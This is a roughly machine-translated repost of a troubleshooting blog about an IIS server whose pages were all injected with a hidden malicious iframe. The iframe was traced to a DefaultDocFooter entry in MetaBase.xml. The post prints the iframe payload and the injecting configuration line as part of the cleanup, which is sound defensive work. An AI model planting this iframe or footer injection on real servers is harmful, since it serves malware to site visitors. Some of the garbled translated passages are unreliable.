My classmates a server almost all open web sites have emerged even HTML pages
<iframe src=http://kaixinba871a.com/w/h5.htm width=100 height=0></iframe>
This style of code for some open and some drug will be reported at the end of the head portion of the anti-virus software
Open the HTML or ASP PHP pages how could not find this code in the source code
Analyze the reasons
The first suspect linked to horse ARP, ARP-proof tools and found no arp spoofing
And arp spoofing generally will not always be inserted into the code, but from time to time
And the use or access, you also can find this code
arp spoofing may be excluded.
Then you probably think JS is tampered with, or contain other files, change the look of the page is not found even a new HTML page browsing time will be inserted into the code, it can only be through the IIS hang a.
Then reinstall the backup data iis iis, the code disappears, iis backup recovery, the problem again.
Looking carefully, the problem should be out on the IIS configuration file, open the configuration file, did not find that code.
It is likely to call a file, how this investigation ah, I suddenly remembered the famous Filemon
Local uploaded a uploaded to the server, open Filemon, too much data, filter out some useless
Leaving only the iis process, or a lot of data, it appears that a lot of people on the site or server access.
Turn off all the site, built a test site anky directory D: www built below a blank page test.htm
Access code is inserted about this page here, look at what Filemon wonder how to read C: Inetpubwwwrootiisstart.htm
Open C: Inetpubwwwrootiisstart.htm a look inside to lay
<iframe src=http://kaixinba871a.com/w/h5.htm width=100 height=0></iframe>
The code removes the blank, access test.htm normal, the C: Inetpubwwwrootiisstart.htm delete visit again
test.htm a "read data footer file error" The problem lies here, appears to be called
This file.
The C: Inetpubwwwrootiisstart.htm emptied normal, so how line, of course, to solve the problem uprooted.
continue
There may be extended due to the expansion in check again all is normal
Of course, by hanging horse ISAPI also exist
Left and right would like to think that eventually the configuration file in question
Open the configuration file, the configuration file in% windir% system32inetsrvMetaBase.xml
Use Notepad to open, find iisstart.htm find a row, I began to think that is the default site, then one would not ah
The default sites are deleted, and then look closely to this code
DefaultDocFooter="FILE:C:Inetpubwwwrootiisstart.htm"
Delete this line, completely solve the problem.
Reproduced in: https: //www.cnblogs.com/200831856/archive/2008/12/10/1351952.html